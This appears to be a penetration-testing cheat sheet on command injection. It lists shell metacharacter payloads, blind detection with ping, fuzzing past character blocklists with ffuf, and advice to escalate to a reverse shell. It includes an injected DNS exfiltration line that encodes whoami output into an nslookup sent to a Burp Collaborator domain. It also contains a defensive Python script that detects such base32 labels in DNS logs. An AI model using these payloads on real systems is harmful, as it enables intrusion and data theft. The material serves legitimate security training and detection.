Cmd Injection

Where Would You Find Command Injection

  • Text boxes that take in input

  • Hidden URLs that take input
      • E.g. /execute/command-name
      • Or through queries, e.g. /location?parameter=command
      • When using URLs, remember to URL-encode the characters that aren't accepted

  • Hidden ports:
      • Some frameworks open debug ports that take in arbitrary commands

Overview

  • Use command line symbols within the input to alter the executed command

  • Pay close attention to application functions that are typically implemented by running an OS command

  • Two forms exist: blind command injection, where you do not see the command's output, and non-blind cmd injection, where the output of the system command is returned to you

  • Ensure you use the proper system commands for the target OS:

cat vs type
ping -c vs ping -n #ping -n causes an infinite ping loop on linux
ls vs dir
  • Try to start with reading a world-readable file

Non-Blind CMD Inj.

  • At the most basic level, once you have identified a potential injection point, use command line symbols within the input to alter the executed command:

; | || & && > >>
  • Once you have exploited non-blind cmd injection, escalate to a reverse shell.

Blind CMD Injection

Identification

  • ICMP and DNS are useful to determine blind cmd injection

google.com; ping -c11 127.0.0.1 #server will hang for roughly 10 seconds
  • You can also try pinging your own machine; however, many corporate environments have firewalls in place to block this, so a missing reply does not always mean blind cmd injection isn't taking place

  • Use tcpdump on your machine to capture the ICMP echo requests.

  • Seeing them proves blind cmd injection; escalate to a reverse shell

Burp Collaborator

  • Launch Burp and choose:

Burp --> Burp Collaborator Client
Press --> "Copy to Clipboard" #to copy a randomly generated domain name
Execute your cmd injection
  • Press Poll Now to see if the request came through

  • If the above worked, move down to the Data Exfil section

Data Exfil via DNS and Burp Collaborator

  • Once you have your Burp Collaborator domain, try your command injection

google.com; a=$(whoami|base32|tr -d =); nslookup $a.COLLAB_DOMAIN_NAME.com
  • Press Poll Now and you should have something returned like this:

O53XOLLEMF2GCCQ.323lijijf90304jklksjru43k23.oastify.com
  • Then type the following in your local terminal

echo -n O53XOLLEMF2GCCQ | wc -c
  • If decoding fails as invalid base32, add one or two equal signs at the end for padding (tr -d = stripped them on the target)

echo -n O53XOLLEMF2GCCQ= | base32 -d
#output:
www-data
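
Added example from the defender's side (not part of the original notes): the base32-label trick above leaves a signature in DNS query logs, so this script scans constructed sample log lines, restores the "=" padding that tr -d = stripped (the general rule, which covers the one-or-two-equals case above, is padding to a multiple of 8 characters), and reports labels that decode to readable text. The log line format, LOG_RE and the MIN_LABEL_LEN threshold are assumptions; adapt them to your resolver's query log.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Constructed sample DNS query log lines (not real traffic). The second line
# carries the base32 label from the Collaborator example above. The log format
# is an assumption; adapt LOG_RE to your resolver's query log.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 10.0.0.5 query: www.example.com IN A
2024-05-01T10:00:02Z 10.0.0.5 query: O53XOLLEMF2GCCQ.323lijijf90304jklksjru43k23.oastify.com IN A
2024-05-01T10:00:03Z 10.0.0.7 query: mail.example.com IN MX
"""
LOG_RE = re.compile(r"^(\S+) (\S+) query: (\S+) IN (\S+)$")
MIN_LABEL_LEN = 8  # assumption: shorter labels are mostly ordinary hostnames

def decode_base32_label(label: str) -> Optional[bytes]:
    """Restore the '=' padding that `tr -d =` stripped (base32 pads to a
    multiple of 8 characters) and decode; None if it is not valid base32."""
    padded = label.upper() + "=" * (-len(label) % 8)
    try:
        return base64.b32decode(padded)
    except (binascii.Error, ValueError):
        return None

def looks_like_text(data: bytes) -> bool:
    """Printable ASCII plus whitespace is the signal worth alerting on."""
    return bool(data) and all(32 <= b < 127 or b in b"\r\n\t" for b in data)

def find_encoded_queries(log_text: str) -> List[Tuple[str, str, str]]:
    """Return (client, queried name, decoded text) for suspicious queries."""
    hits = []
    for line in log_text.splitlines():
        match = LOG_RE.match(line)
        if not match:
            continue
        client, qname = match.group(2), match.group(3)
        first_label = qname.split(".")[0]  # the encoded data rides here
        if len(first_label) < MIN_LABEL_LEN:
            continue
        decoded = decode_base32_label(first_label)
        if decoded is not None and looks_like_text(decoded):
            hits.append((client, qname, decoded.decode("ascii")))
    return hits

if __name__ == "__main__":
    for client, qname, text in find_encoded_queries(SAMPLE_LOG):
        print(f"{client} -> {qname}: {text!r}")
```

The upper-casing in decode_base32_label matters because resolvers may change label case on the way through, while base32 decoding is case-sensitive.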

Bypassing Character Blocklist with ffuf

  • If you see that some special characters are banned, create a Burp request to the resource you want to test

  • It should be a POST request

  • Identify the parameter that is used to post the data to the server

name=;ls
  • Swap out the command injection attempt that is getting blocked in the Burp request with:

name=FUZZ
  • Save the Burp request to a file on your local machine

ffuf -request search.request --request-proto http -w /opt/Seclists/Fuzzing/special-chars.txt
  • You will usually have to ignore the & character, as many web servers will treat it as the start of another parameter

  • Once you have your results back, filter out the most common response size that you see being returned:

  • -fs 724

  • You can comma-separate filter sizes, i.e. if you see a lot of 724 and 726 responses saying that the character you posted is blocked:

  • -fs 724,726

  • Also use -mc all (match all status codes) so you see every HTTP status code returned; look for 5XX errors

  • If you see errors on:

{ == SSTI
; | & == cmd injection
' " == SQLi
